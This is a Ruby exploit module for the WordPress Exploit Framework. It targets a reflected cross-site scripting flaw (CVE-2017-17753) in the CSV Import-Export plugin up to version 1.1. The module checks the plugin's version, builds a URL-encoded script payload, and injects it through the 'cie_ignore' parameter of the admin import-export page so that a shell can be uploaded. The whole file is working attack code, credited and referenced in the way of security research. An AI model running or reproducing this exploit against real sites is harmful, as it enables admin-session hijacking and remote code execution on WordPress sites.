# frozen_string_literal: true

class Wpxf::Exploit::CsvImportExportReflectedXssShellUpload < Wpxf::Module
  include Wpxf::WordPress::ReflectedXss

  def initialize
    super

    update_info(
      name: 'CSV Import-Export <= 1.1 Reflected XSS Shell Upload',
      author: [
        'Nicolas Buzy-Debat', # Discovery
        'rastating'           # WPXF module
      ],
      references: [
        ['CVE', '2017-17753'],
        ['WPVDB', '8983'],
        ['URL', 'http://seclists.org/fulldisclosure/2017/Dec/73']
      ],
      date: 'Dec 19 2017'
    )
  end

  def check
    check_plugin_version_from_changelog('csv-import-export', 'readme.txt', '1.1.1')
  end

  def xss_payload
    url_encode("<script>#{xss_ascii_encoded_include_script}</script>")
  end

  def url_with_xss
    "#{wordpress_url_admin_options}?page=esb-cie-import-export-page&cie_ignore=#{xss_payload}"
  end
end
